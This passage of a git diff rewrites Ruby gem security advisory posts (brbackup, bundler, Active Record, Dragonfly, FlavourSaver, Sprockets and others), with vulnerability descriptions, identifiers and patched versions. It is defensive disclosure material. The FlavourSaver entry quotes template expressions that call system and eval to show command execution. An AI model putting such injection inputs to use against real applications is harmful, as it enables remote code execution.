+  description: |
+    brbackup Gem for Ruby contains a flaw that may allow carrying out an SQL
+    injection attack. The issue is due to the /lib/brbackup.rb script not
+    properly sanitizing user-supplied input to the 'name' parameter. This may
+    allow a remote attacker to inject or manipulate SQL queries in the back-end
+    database, allowing for the manipulation or disclosure of arbitrary data.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/10/6
+    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
+    - https://github.com/tongueroo/brbackup/blob/master/lib/brbackup.rb
+    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
+    - http://www.vapidlabs.com/advisory.php?v=25
+    - http://osvdb.org/show/osvdb/108899
+---
diff --git a/advisories/_posts/2014-07-09-OSVDB-108900.md b/advisories/_posts/2014-07-09-OSVDB-108900.md
index abb5a05c..9a92cfea 100644
--- a/advisories/_posts/2014-07-09-OSVDB-108900.md
+++ b/advisories/_posts/2014-07-09-OSVDB-108900.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-108900 (brbackup): brbackup Gem for Ruby dbuser Variable Shell Metacharacter
-  Injection Remote Command Execution'
-comments: false
-categories:
-- brbackup
-advisory:
-  gem: brbackup
-  osvdb: 108900
-  url: https://www.openwall.com/lists/oss-security/2014/07/10/6
-  title: brbackup Gem for Ruby dbuser Variable Shell Metacharacter Injection Remote
-    Command Execution
-  date: 2014-07-09
-  description: |
-    brbackup Gem for Ruby contains a flaw that is triggered as input passed
-    via the 'dbuser' variable is not properly sanitized. This may allow a
-    remote attacker to inject shell metacharacters and execute arbitrary
-    commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/10/6
-    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
-    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
-    - http://www.vapidlabs.com/advisory.php?v=25
-    - http://osvdb.org/show/osvdb/108900
----
+---
+layout: advisory
+title: 'OSVDB-108900 (brbackup): brbackup Gem for Ruby dbuser Variable Shell Metacharacter
+  Injection Remote Command Execution'
+comments: false
+categories:
+- brbackup
+advisory:
+  gem: brbackup
+  osvdb: 108900
+  url: https://www.openwall.com/lists/oss-security/2014/07/10/6
+  title: brbackup Gem for Ruby dbuser Variable Shell Metacharacter Injection Remote
+    Command Execution
+  date: 2014-07-09
+  description: |
+    brbackup Gem for Ruby contains a flaw that is triggered as input passed
+    via the 'dbuser' variable is not properly sanitized. This may allow a
+    remote attacker to inject shell metacharacters and execute arbitrary
+    commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/10/6
+    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
+    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
+    - http://www.vapidlabs.com/advisory.php?v=25
+    - http://osvdb.org/show/osvdb/108900
+---
diff --git a/advisories/_posts/2014-08-13-CVE-2013-0334.md b/advisories/_posts/2014-08-13-CVE-2013-0334.md
index 6fc45283..11d86d58 100644
--- a/advisories/_posts/2014-08-13-CVE-2013-0334.md
+++ b/advisories/_posts/2014-08-13-CVE-2013-0334.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0334 (bundler): CVE-2013-0334 rubygem-bundler: ''bundle install''
-  may install a gem from a source other than expected'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  cve: 2013-0334
-  osvdb: 110004
-  ghsa: 49jx-9cmc-xjxm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0334
-  title: 'CVE-2013-0334 rubygem-bundler: ''bundle install'' may install a gem from
-    a source other than expected'
-  date: 2014-08-13
-  description: |
-    Bundler before 1.7, when multiple top-level source lines are used, allows
-    remote attackers to install arbitrary gems by creating a gem with the same name
-    as another gem in a different source. A flaw was found in the way Bundler handled
-    gems available from multiple sources. An attacker with access to one of the sources
-    could create a malicious gem with the same name, which they could then use to trick
-    a user into installing, potentially resulting in execution of code from the attacker-supplied
-    malicious gem.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 1.7.0"
----
+---
+layout: advisory
+title: 'CVE-2013-0334 (bundler): CVE-2013-0334 rubygem-bundler: ''bundle install''
+  may install a gem from a source other than expected'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  cve: 2013-0334
+  osvdb: 110004
+  ghsa: 49jx-9cmc-xjxm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0334
+  title: 'CVE-2013-0334 rubygem-bundler: ''bundle install'' may install a gem from
+    a source other than expected'
+  date: 2014-08-13
+  description: |
+    Bundler before 1.7, when multiple top-level source lines are used, allows
+    remote attackers to install arbitrary gems by creating a gem with the same name
+    as another gem in a different source. A flaw was found in the way Bundler handled
+    gems available from multiple sources. An attacker with access to one of the sources
+    could create a malicious gem with the same name, which they could then use to trick
+    a user into installing, potentially resulting in execution of code from the attacker-supplied
+    malicious gem.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 1.7.0"
+---
diff --git a/advisories/_posts/2014-08-18-CVE-2014-3514.md b/advisories/_posts/2014-08-18-CVE-2014-3514.md
index 2d6defdb..ff3dc5d5 100644
--- a/advisories/_posts/2014-08-18-CVE-2014-3514.md
+++ b/advisories/_posts/2014-08-18-CVE-2014-3514.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2014-3514 (activerecord): Data Injection Vulnerability in Active Record'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2014-3514
-  ghsa: 9rf5-jm6f-2fmm
-  url: https://groups.google.com/forum/#!msg/rubyonrails-security/M4chq5Sb540/CC1Fh0Y_NWwJ
-  title: Data Injection Vulnerability in Active Record
-  date: 2014-08-18
-  description: |
-    The create_with functionality in Active Record was implemented incorrectly
-    and completely bypasses the strong parameters protection. Applications which pass
-    user-controlled values to create_with could allow attackers to set arbitrary attributes
-    on models.
-  cvss_v2: 8.7
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 4.0.9"
-  - ">= 4.1.5"
----
+---
+layout: advisory
+title: 'CVE-2014-3514 (activerecord): Data Injection Vulnerability in Active Record'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2014-3514
+  ghsa: 9rf5-jm6f-2fmm
+  url: https://groups.google.com/forum/#!msg/rubyonrails-security/M4chq5Sb540/CC1Fh0Y_NWwJ
+  title: Data Injection Vulnerability in Active Record
+  date: 2014-08-18
+  description: |
+    The create_with functionality in Active Record was implemented incorrectly
+    and completely bypasses the strong parameters protection. Applications which pass
+    user-controlled values to create_with could allow attackers to set arbitrary attributes
+    on models.
+  cvss_v2: 8.7
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 4.0.9"
+  - ">= 4.1.5"
+---
diff --git a/advisories/_posts/2014-08-22-CVE-2014-5441.md b/advisories/_posts/2014-08-22-CVE-2014-5441.md
index a3f6befc..f9b3a6d5 100644
--- a/advisories/_posts/2014-08-22-CVE-2014-5441.md
+++ b/advisories/_posts/2014-08-22-CVE-2014-5441.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2014-5441 (fat_free_crm): Fat Free CRM Gem contains a javascript cross-site
-  scripting (XSS) vulnerability'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2014-5441
-  osvdb: 110420
-  ghsa: wcfx-3m6v-4frg
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5441
-  title: Fat Free CRM Gem contains a javascript cross-site scripting (XSS) vulnerability
-  date: 2014-08-22
-  description: |
-    Fat Free CRM Gem contains a javascript cross-site scripting (XSS)
-    vulnerability. When a user is created/updated using a specifically
-    crafted username, first name or last name, it is possible for
-    arbitrary javascript to be executed on all Fat Free CRM pages.
-    This code would be executed for all logged in users.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "<= 0.11.0"
-  patched_versions:
-  - ">= 0.13.3"
----
+---
+layout: advisory
+title: 'CVE-2014-5441 (fat_free_crm): Fat Free CRM Gem contains a javascript cross-site
+  scripting (XSS) vulnerability'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2014-5441
+  osvdb: 110420
+  ghsa: wcfx-3m6v-4frg
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5441
+  title: Fat Free CRM Gem contains a javascript cross-site scripting (XSS) vulnerability
+  date: 2014-08-22
+  description: |
+    Fat Free CRM Gem contains a javascript cross-site scripting (XSS)
+    vulnerability. When a user is created/updated using a specifically
+    crafted username, first name or last name, it is possible for
+    arbitrary javascript to be executed on all Fat Free CRM pages.
+    This code would be executed for all logged in users.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "<= 0.11.0"
+  patched_versions:
+  - ">= 0.13.3"
+---
diff --git a/advisories/_posts/2014-08-25-OSVDB-110439.md b/advisories/_posts/2014-08-25-OSVDB-110439.md
index a2150f26..2d71b57f 100644
--- a/advisories/_posts/2014-08-25-OSVDB-110439.md
+++ b/advisories/_posts/2014-08-25-OSVDB-110439.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-110439 (dragonfly): Dragonfly Gem for Ruby Image Uploading & Processing
-  Remote Command Execution'
-comments: false
-categories:
-- dragonfly
-advisory:
-  gem: dragonfly
-  osvdb: 110439
-  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
-  title: Dragonfly Gem for Ruby Image Uploading & Processing Remote Command Execution
-  date: 2014-08-25
-  description: |
-    Dragonfly Gem for Ruby contains a flaw in Uploading & Processing
-    that is due to the gem failing to restrict arbitrary commands to
-    imagemagicks convert. This may allow a remote attacker to gain
-    read/write access to the filesystem and execute arbitrary commands.
-  patched_versions:
-  - ">= 1.0.7"
-  related:
-    url:
-    - https://github.com/markevans/dragonfly/compare/v1.0.6...v1.0.7
-    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
-    - https://www.mend.io/vulnerability-database/WS-2014-0016
-    - http://osvdb.org/show/osvdb/110439
----
+---
+layout: advisory
+title: 'OSVDB-110439 (dragonfly): Dragonfly Gem for Ruby Image Uploading & Processing
+  Remote Command Execution'
+comments: false
+categories:
+- dragonfly
+advisory:
+  gem: dragonfly
+  osvdb: 110439
+  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
+  title: Dragonfly Gem for Ruby Image Uploading & Processing Remote Command Execution
+  date: 2014-08-25
+  description: |
+    Dragonfly Gem for Ruby contains a flaw in Uploading & Processing
+    that is due to the gem failing to restrict arbitrary commands to
+    imagemagicks convert. This may allow a remote attacker to gain
+    read/write access to the filesystem and execute arbitrary commands.
+  patched_versions:
+  - ">= 1.0.7"
+  related:
+    url:
+    - https://github.com/markevans/dragonfly/compare/v1.0.6...v1.0.7
+    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
+    - https://www.mend.io/vulnerability-database/WS-2014-0016
+    - http://osvdb.org/show/osvdb/110439
+---
diff --git a/advisories/_posts/2014-09-04-OSVDB-110796.md b/advisories/_posts/2014-09-04-OSVDB-110796.md
index f7391656..8fc075f6 100644
--- a/advisories/_posts/2014-09-04-OSVDB-110796.md
+++ b/advisories/_posts/2014-09-04-OSVDB-110796.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-110796 (flavour_saver): FlavourSaver handlebars helper remote code execution.'
-comments: false
-categories:
-- flavour_saver
-advisory:
-  gem: flavour_saver
-  osvdb: 110796
-  url: https://security.snyk.io/vuln/SNYK-RUBY-FLAVOURSAVER-5457859
-  title: FlavourSaver handlebars helper remote code execution.
-  date: 2014-09-04
-  description: |
-    FlavourSaver contains a flaw in helper method dispatch where it uses
-    Kernel::send to call helpers without checking that they are defined
-    within the template context first.  This allows expressions such as
-    {{system "ls"}} or {{eval "puts 1 + 1"}} to be executed.
-  patched_versions:
-  - ">= 0.3.3"
-  related:
-    url:
-    - https://github.com/FlavourSaver/FlavourSaver/compare/v0.3.2...v0.3.3
-    - https://github.com/FlavourSaver/FlavourSaver/commit/04a8ff444a9a9668a75b01b20b4974d398087a64
-    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
-    - https://github.com/slowmistio/dawnscanner-analysis-security-scanner-for-ruby-/blob/master/Roadmap.md
-    - https://security.snyk.io/vuln/SNYK-RUBY-FLAVOURSAVER-5457859
-    - http://osvdb.org/show/osvdb/110796
----
+---
+layout: advisory
+title: 'OSVDB-110796 (flavour_saver): FlavourSaver handlebars helper remote code execution.'
+comments: false
+categories:
+- flavour_saver
+advisory:
+  gem: flavour_saver
+  osvdb: 110796
+  url: https://security.snyk.io/vuln/SNYK-RUBY-FLAVOURSAVER-5457859
+  title: FlavourSaver handlebars helper remote code execution.
+  date: 2014-09-04
+  description: |
+    FlavourSaver contains a flaw in helper method dispatch where it uses
+    Kernel::send to call helpers without checking that they are defined
+    within the template context first.  This allows expressions such as
+    {{system "ls"}} or {{eval "puts 1 + 1"}} to be executed.
+  patched_versions:
+  - ">= 0.3.3"
+  related:
+    url:
+    - https://github.com/FlavourSaver/FlavourSaver/compare/v0.3.2...v0.3.3
+    - https://github.com/FlavourSaver/FlavourSaver/commit/04a8ff444a9a9668a75b01b20b4974d398087a64
+    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
+    - https://github.com/slowmistio/dawnscanner-analysis-security-scanner-for-ruby-/blob/master/Roadmap.md
+    - https://security.snyk.io/vuln/SNYK-RUBY-FLAVOURSAVER-5457859
+    - http://osvdb.org/show/osvdb/110796
+---
diff --git a/advisories/_posts/2014-09-25-OSVDB-112683.md b/advisories/_posts/2014-09-25-OSVDB-112683.md
index 0ed84a22..7cc310c9 100644
--- a/advisories/_posts/2014-09-25-OSVDB-112683.md
+++ b/advisories/_posts/2014-09-25-OSVDB-112683.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-112683 (as): as Gem for Ruby Process List Local Plaintext Credentials
-  Disclosure'
-comments: false
-categories:
-- as
-advisory:
-  gem: as
-  osvdb: 112683
-  url: https://security.snyk.io/vuln/SNYK-RUBY-AS-20195
-  title: as Gem for Ruby Process List Local Plaintext Credentials Disclosure
-  date: 2014-09-25
-  description: |
-    as Gem for Ruby contains a flaw that is due to the program displaying
-    credential information in plaintext in the process list. This may
-    allow a local attacker to gain access to credential information.
-  notes: Never patched
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-AS-20195
-    - http://www.vapid.dhs.org/advisories/as-v1.0.html
-    - http://www.vapidlabs.com/advisory.php?v=17
-    - http://osvdb.org/show/osvdb/112683
----
+---
+layout: advisory
+title: 'OSVDB-112683 (as): as Gem for Ruby Process List Local Plaintext Credentials
+  Disclosure'
+comments: false
+categories:
+- as
+advisory:
+  gem: as
+  osvdb: 112683
+  url: https://security.snyk.io/vuln/SNYK-RUBY-AS-20195
+  title: as Gem for Ruby Process List Local Plaintext Credentials Disclosure
+  date: 2014-09-25
+  description: |
+    as Gem for Ruby contains a flaw that is due to the program displaying
+    credential information in plaintext in the process list. This may
+    allow a local attacker to gain access to credential information.
+  notes: Never patched
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-AS-20195
+    - http://www.vapid.dhs.org/advisories/as-v1.0.html
+    - http://www.vapidlabs.com/advisory.php?v=17
+    - http://osvdb.org/show/osvdb/112683
+---
diff --git a/advisories/_posts/2014-09-27-CVE-2014-10077.md b/advisories/_posts/2014-09-27-CVE-2014-10077.md
index fc5b48d6..a3c825d7 100644
--- a/advisories/_posts/2014-09-27-CVE-2014-10077.md
+++ b/advisories/_posts/2014-09-27-CVE-2014-10077.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2014-10077 (i18n): i18n Gem for Ruby lib/i18n/core_ext/hash.rb Hash#slice()
-  Function Hash Handling DoS'
-comments: false
-categories:
-- i18n
-advisory:
-  gem: i18n
-  cve: 2014-10077
-  ghsa: 34hf-g744-jw64
-  url: https://github.com/svenfuchs/i18n/pull/289
-  title: i18n Gem for Ruby lib/i18n/core_ext/hash.rb Hash#slice() Function Hash Handling
-    DoS
-  date: 2014-09-27
-  description: |
-    i18n Gem for Ruby contains a flaw in the Hash#slice() function in
-    lib/i18n/core_ext/hash.rb that is triggered when calling a hash when
-    :some_key is in keep_keys but not in the hash. This may allow an attacker
-    to cause the program to crash.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.8.0"
-  related:
-    osvdb:
-    - 121500
----
+---
+layout: advisory
+title: 'CVE-2014-10077 (i18n): i18n Gem for Ruby lib/i18n/core_ext/hash.rb Hash#slice()
+  Function Hash Handling DoS'
+comments: false
+categories:
+- i18n
+advisory:
+  gem: i18n
+  cve: 2014-10077
+  ghsa: 34hf-g744-jw64
+  url: https://github.com/svenfuchs/i18n/pull/289
+  title: i18n Gem for Ruby lib/i18n/core_ext/hash.rb Hash#slice() Function Hash Handling
+    DoS
+  date: 2014-09-27
+  description: |
+    i18n Gem for Ruby contains a flaw in the Hash#slice() function in
+    lib/i18n/core_ext/hash.rb that is triggered when calling a hash when
+    :some_key is in keep_keys but not in the hash. This may allow an attacker
+    to cause the program to crash.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.8.0"
+  related:
+    osvdb:
+    - 121500
+---
diff --git a/advisories/_posts/2014-09-29-GHSA-mpwp-4h2m-765c.md b/advisories/_posts/2014-09-29-GHSA-mpwp-4h2m-765c.md
index 6ecba118..95400efe 100644
--- a/advisories/_posts/2014-09-29-GHSA-mpwp-4h2m-765c.md
+++ b/advisories/_posts/2014-09-29-GHSA-mpwp-4h2m-765c.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'GHSA-mpwp-4h2m-765c (activejob): Active Job - Object injection security vulnerability
-  if Global IDs'
-comments: false
-categories:
-- activejob
-- rails
-advisory:
-  gem: activejob
-  framework: rails
-  ghsa: mpwp-4h2m-765c
-  osvdb: 112347
-  url: https://github.com/advisories/GHSA-mpwp-4h2m-765c
-  title: Active Job - Object injection security vulnerability if Global IDs
-  date: 2014-09-29
-  description: |
-    Active Job vulnerability: An Active Job bug allowed String
-    arguments to be deserialized as if they were Global IDs, an
-    object injection security vulnerability.
-
-    * In release post: "Active Job vulnerability:
-      We also fixed an Active Job bug that allowed String
-      arguments to be deserialized as if they were Global IDs,
-      an object injection security vulnerability.
-  patched_versions:
-  - ">= 4.2.0.beta2"
-  related:
-    url:
-    - https://advisories.gitlab.com/pkg/gem/activejob/OSVDB-112347
-    - https://rubyonrails.org/2014/9/29/Rails-4-2-0-beta2-has-been-released
-    - https://advisories.gitlab.com/pkg/gem/activejob/GHSA-mpwp-4h2m-765c
-    - https://github.com/advisories/GHSA-mpwp-4h2m-765c
-  notes: "- No CVE or CVSS values.\n"
----
+---
+layout: advisory
+title: 'GHSA-mpwp-4h2m-765c (activejob): Active Job - Object injection security vulnerability
+  if Global IDs'
+comments: false
+categories:
+- activejob
+- rails
+advisory:
+  gem: activejob
+  framework: rails
+  ghsa: mpwp-4h2m-765c
+  osvdb: 112347
+  url: https://github.com/advisories/GHSA-mpwp-4h2m-765c
+  title: Active Job - Object injection security vulnerability if Global IDs
+  date: 2014-09-29
+  description: |
+    Active Job vulnerability: An Active Job bug allowed String
+    arguments to be deserialized as if they were Global IDs, an
+    object injection security vulnerability.
+
+    * In release post: "Active Job vulnerability:
+      We also fixed an Active Job bug that allowed String
+      arguments to be deserialized as if they were Global IDs,
+      an object injection security vulnerability.
+  patched_versions:
+  - ">= 4.2.0.beta2"
+  related:
+    url:
+    - https://advisories.gitlab.com/pkg/gem/activejob/OSVDB-112347
+    - https://rubyonrails.org/2014/9/29/Rails-4-2-0-beta2-has-been-released
+    - https://advisories.gitlab.com/pkg/gem/activejob/GHSA-mpwp-4h2m-765c
+    - https://github.com/advisories/GHSA-mpwp-4h2m-765c
+  notes: "- No CVE or CVSS values.\n"
+---
diff --git a/advisories/_posts/2014-09-29-OSVDB-112346.md b/advisories/_posts/2014-09-29-OSVDB-112346.md
index f00bca7a..e142f215 100644
--- a/advisories/_posts/2014-09-29-OSVDB-112346.md
+++ b/advisories/_posts/2014-09-29-OSVDB-112346.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-112346 (web-console): Web Console Gem for Ruby contains an unspecified
-  flaw'
-comments: false
-categories:
-- web-console
-advisory:
-  gem: web-console
-  osvdb: 112346
-  url: https://my.diffend.io/gems/web-console/versions/2.0.0.beta3
-  title: Web Console Gem for Ruby contains an unspecified flaw
-  date: 2014-09-29
-  description: |
-    The Web Console Gem for Ruby on Rails contains an unspecified
-    flaw that may allow an attacker to have an unspecified impact.
-    No further details have been provided by the vendor.
-  patched_versions:
-  - ">= 2.0.0.beta4"
-  related:
-    url:
-    - https://github.com/rails/web-console/compare/v2.0.0.beta3...v2.0.0.beta4
-    - https://my.diffend.io/gems/web-console/versions/2.0.0.beta3
-    - https://github.com/slowmistio/dawnscanner-analysis-security-scanner-for-ruby-/blob/master/Roadmap.md
-    - http://www.osvdb.org/show/osvdb/112346
----
+---
+layout: advisory
+title: 'OSVDB-112346 (web-console): Web Console Gem for Ruby contains an unspecified
+  flaw'
+comments: false
+categories:
+- web-console
+advisory:
+  gem: web-console
+  osvdb: 112346
+  url: https://my.diffend.io/gems/web-console/versions/2.0.0.beta3
+  title: Web Console Gem for Ruby contains an unspecified flaw
+  date: 2014-09-29
+  description: |
+    The Web Console Gem for Ruby on Rails contains an unspecified
+    flaw that may allow an attacker to have an unspecified impact.
+    No further details have been provided by the vendor.
+  patched_versions:
+  - ">= 2.0.0.beta4"
+  related:
+    url:
+    - https://github.com/rails/web-console/compare/v2.0.0.beta3...v2.0.0.beta4
+    - https://my.diffend.io/gems/web-console/versions/2.0.0.beta3
+    - https://github.com/slowmistio/dawnscanner-analysis-security-scanner-for-ruby-/blob/master/Roadmap.md
+    - http://www.osvdb.org/show/osvdb/112346
+---
diff --git a/advisories/_posts/2014-10-13-OSVDB-126330.md b/advisories/_posts/2014-10-13-OSVDB-126330.md
index 4e35f50f..f76c651f 100644
--- a/advisories/_posts/2014-10-13-OSVDB-126330.md
+++ b/advisories/_posts/2014-10-13-OSVDB-126330.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'OSVDB-126330 (sidekiq-pro): Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb
-  Description Element XSS'
-comments: false
-categories:
-- sidekiq-pro
-advisory:
-  gem: sidekiq-pro
-  osvdb: 126330
-  url: https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20197
-  title: Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb Description Element XSS
-  date: 2014-10-13
-  description: 'XSS via batch description in Sidekiq::Web
-
-    '
-  patched_versions:
-  - ">= 1.9.1"
-  related:
-    url:
-    - https://github.com/mperham/sidekiq/commit/99b12fb50fe244c5a317f03f1bed9b333ec56ebe
-    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20197
----
+---
+layout: advisory
+title: 'OSVDB-126330 (sidekiq-pro): Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb
+  Description Element XSS'
+comments: false
+categories:
+- sidekiq-pro
+advisory:
+  gem: sidekiq-pro
+  osvdb: 126330
+  url: https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20197
+  title: Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb Description Element XSS
+  date: 2014-10-13
+  description: 'XSS via batch description in Sidekiq::Web
+
+    '
+  patched_versions:
+  - ">= 1.9.1"
+  related:
+    url:
+    - https://github.com/mperham/sidekiq/commit/99b12fb50fe244c5a317f03f1bed9b333ec56ebe
+    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20197
+---
diff --git a/advisories/_posts/2014-10-30-CVE-2014-7818.md b/advisories/_posts/2014-10-30-CVE-2014-7818.md
index d9d1dec7..cc66c7c2 100644
--- a/advisories/_posts/2014-10-30-CVE-2014-7818.md
+++ b/advisories/_posts/2014-10-30-CVE-2014-7818.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2014-7818 (actionpack): Arbitrary file existence disclosure in Action
-  Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2014-7818
-  ghsa: 29gr-w57f-rpfw
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/dCp7duBiQgo
-  title: Arbitrary file existence disclosure in Action Pack
-  date: 2014-10-30
-  description: |
-    Specially crafted requests can be used to determine whether a file exists on
-    the filesystem that is outside the Rails application's root directory.  The
-    files will not be served, but attackers can determine whether or not the file
-    exists.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 3.2.20"
-  - "~> 4.0.11"
-  - "~> 4.1.7"
-  - ">= 4.2.0.beta3"
----
+---
+layout: advisory
+title: 'CVE-2014-7818 (actionpack): Arbitrary file existence disclosure in Action
+  Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2014-7818
+  ghsa: 29gr-w57f-rpfw
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/dCp7duBiQgo
+  title: Arbitrary file existence disclosure in Action Pack
+  date: 2014-10-30
+  description: |
+    Specially crafted requests can be used to determine whether a file exists on
+    the filesystem that is outside the Rails application's root directory.  The
+    files will not be served, but attackers can determine whether or not the file
+    exists.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 3.2.20"
+  - "~> 4.0.11"
+  - "~> 4.1.7"
+  - ">= 4.2.0.beta3"
+---
diff --git a/advisories/_posts/2014-10-30-CVE-2014-7819.md b/advisories/_posts/2014-10-30-CVE-2014-7819.md
index 90083454..aa5cd19f 100644
--- a/advisories/_posts/2014-10-30-CVE-2014-7819.md
+++ b/advisories/_posts/2014-10-30-CVE-2014-7819.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2014-7819 (sprockets): CVE-2014-7819 rubygem-sprockets: arbitrary file
-  existence disclosure'
-comments: false
-categories:
-- sprockets
-advisory:
-  gem: sprockets
-  cve: 2014-7819
-  osvdb: 113965
-  ghsa: 33pp-3763-mrfp
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/doAVp0YaTqY
-  title: 'CVE-2014-7819 rubygem-sprockets: arbitrary file existence disclosure'
-  date: 2014-10-30
-  description: |
-    Multiple directory traversal vulnerabilities in server.rb in Sprockets
-    before 2.0.5, 2.1.x before 2.1.4, 2.2.x before 2.2.3, 2.3.x before 2.3.3, 2.4.x
-    before 2.4.6, 2.5.x before 2.5.1, 2.6.x and 2.7.x before 2.7.1, 2.8.x before 2.8.3,
-    2.9.x before 2.9.4, 2.10.x before 2.10.2, 2.11.x before 2.11.3, 2.12.x before 2.12.3,
-    and 3.x before 3.0.0.beta.3, as distributed with Ruby on Rails 3.x and 4.x, allow
-    remote attackers to determine the existence of files outside the application root
-    via a ../ (dot dot slash) sequence with (1) double slashes or (2) URL encoding.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 2.0.5"
-  - "~> 2.1.4"
-  - "~> 2.2.3"
-  - "~> 2.3.3"
-  - "~> 2.4.6"
-  - "~> 2.5.1"
-  - "~> 2.7.1"
-  - "~> 2.8.3"
-  - "~> 2.9.4"
-  - "~> 2.10.2"
-  - "~> 2.11.3"
-  - "~> 2.12.3"
-  - ">= 3.0.0.beta.3"
----
+---
+layout: advisory
+title: 'CVE-2014-7819 (sprockets): CVE-2014-7819 rubygem-sprockets: arbitrary file
+  existence disclosure'
+comments: false
+categories:
+- sprockets
+advisory:
+  gem: sprockets
+  cve: 2014-7819
+  osvdb: 113965
+  ghsa: 33pp-3763-mrfp
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/doAVp0YaTqY
+  title: 'CVE-2014-7819 rubygem-sprockets: arbitrary file existence disclosure'
+  date: 2014-10-30
+  description: |
+    Multiple directory traversal vulnerabilities in server.rb in Sprockets
+    before 2.0.5, 2.1.x before 2.1.4, 2.2.x before 2.2.3, 2.3.x before 2.3.3, 2.4.x
+    before 2.4.6, 2.5.x before 2.5.1, 2.6.x and 2.7.x before 2.7.1, 2.8.x before 2.8.3,
+    2.9.x before 2.9.4, 2.10.x before 2.10.2, 2.11.x before 2.11.3, 2.12.x before 2.12.3,
+    and 3.x before 3.0.0.beta.3, as distributed with Ruby on Rails 3.x and 4.x, allow
+    remote attackers to determine the existence of files outside the application root
+    via a ../ (dot dot slash) sequence with (1) double slashes or (2) URL encoding.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 2.0.5"
+  - "~> 2.1.4"
+  - "~> 2.2.3"
+  - "~> 2.3.3"
+  - "~> 2.4.6"
+  - "~> 2.5.1"
+  - "~> 2.7.1"
+  - "~> 2.8.3"
+  - "~> 2.9.4"
+  - "~> 2.10.2"
+  - "~> 2.11.3"
+  - "~> 2.12.3"
+  - ">= 3.0.0.beta.3"
+---
diff --git a/advisories/_posts/2014-11-17-CVE-2014-7829.md b/advisories/_posts/2014-11-17-CVE-2014-7829.md
index eef47bf2..4f099051 100644
--- a/advisories/_posts/2014-11-17-CVE-2014-7829.md
+++ b/advisories/_posts/2014-11-17-CVE-2014-7829.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2014-7829 (actionpack): Arbitrary file existence disclosure in Action
-  Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
